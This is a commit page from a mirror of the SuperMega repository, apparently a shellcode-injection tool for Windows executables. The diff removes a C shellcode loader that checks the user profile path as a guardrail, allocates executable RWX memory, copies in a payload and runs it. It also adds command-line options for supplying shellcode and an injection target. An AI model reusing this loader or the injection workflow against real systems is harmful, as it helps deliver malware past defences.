admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-03 01:27:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

refactor: cleanup

Browse Source
This commit is contained in:
Dobin
2024-02-11 10:59:28 +00:00
parent 92048b357d
commit 49b8c45b67
4 changed files with 11 additions and 62 deletions
Download Patch File Download Diff File Expand all files Collapse all files
project.py
+1 -1
View File
@@ -19,7 +19,7 @@ class Project():
self.exe_capabilities: ExeCapabilities = None self.exe_capabilities: ExeCapabilities = None
# debug # debug
self.show_command_output = True self.show_command_output = False
self.verify: bool = False self.verify: bool = False
self.try_start_loader_shellcode: bool = False self.try_start_loader_shellcode: bool = False
source/iat_reuse/main.c
-43
View File
@@ -1,43 +0,0 @@
#include <Windows.h>
char *supermega_payload;
int main()
{
// Execution Guardrail: Env Check
wchar_t envVarName[] = {'U','S','E','R','P','R','O','F','I','L','E', 0};
wchar_t tocheck[] = {'C',':','\\','U','s','e','r','s','\\','h','a','c','k','e','r', 0}; // L"C:\\Users\\hacker"
WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
DWORD result = ((DWORD(WINAPI*)(LPCWSTR, LPWSTR, DWORD))GetEnvironmentVariableW)(envVarName, buffer, 1024);
if (result == 0) {
return 6;
}
if (mystrcmp(buffer, tocheck) != 0) {
return 6;
}
// Copy shellcode
// ntdll.dll: VirtualAlloc()
char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40);
// 11223344 is a magic number which will be replaced in the asm source
// with the payload length.
for(int n=0; n<11223344; n++) {
dest[n] = supermega_payload[n];
}
// Exec shellcode
(*(void(*)())(dest))();
return 0;
}
int mystrcmp(wchar_t* str1, wchar_t* str2) {
int i = 0;
while (str1[i] != L'\0' && str2[i] != L'\0') {
if (str1[i] != str2[i]) {
return 1;
}
i++;
}
return 0;
}
source/iat_reuse/template.c
+5 -17
View File
@@ -16,31 +16,19 @@ int main()
return 6; return 6;
} }
// Allocate RWX segment
// char *dest = ... // char *dest = ...
{{ plugin_allocator }} {{ plugin_allocator }}
// dest[] = supermega_payload[] // Copy
// from: supermega_payload[]
// to: dest[]
// len: 0x11223344 // len: 0x11223344
{{ plugin_decoder }} {{ plugin_decoder }}
// dest[] // Execute *dest
{{ plugin_executor }} {{ plugin_executor }}
/*
// Copy shellcode
// ntdll.dll: VirtualAlloc()
char *dest = VirtualAlloc(NULL, 4096, 0x3000, 0x40);
// 11223344 is a magic number which will be replaced in the asm source
// with the payload length.
for(int n=0; n<11223344; n++) {
dest[n] = supermega_payload[n];
}
// Exec shellcode
(*(void(*)())(dest))();
*/
return 0; return 0;
} }
supermega.py
+4
View File
@@ -28,8 +28,12 @@ def main():
parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode') parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode')
parser.add_argument('--inject', type=str, help='The path to the file where we will inject ourselves in') parser.add_argument('--inject', type=str, help='The path to the file where we will inject ourselves in')
parser.add_argument('--verify', type=str, help='Debug: Perform verification: std/iat') parser.add_argument('--verify', type=str, help='Debug: Perform verification: std/iat')
parser.add_argument('--show', type=str, help='Debug: Show tool output')
args = parser.parse_args() args = parser.parse_args()
if args.show:
project.show_command_output = True
if args.verify: if args.verify:
project.payload = "shellcodes/createfile.bin" project.payload = "shellcodes/createfile.bin"
project.verify = True project.verify = True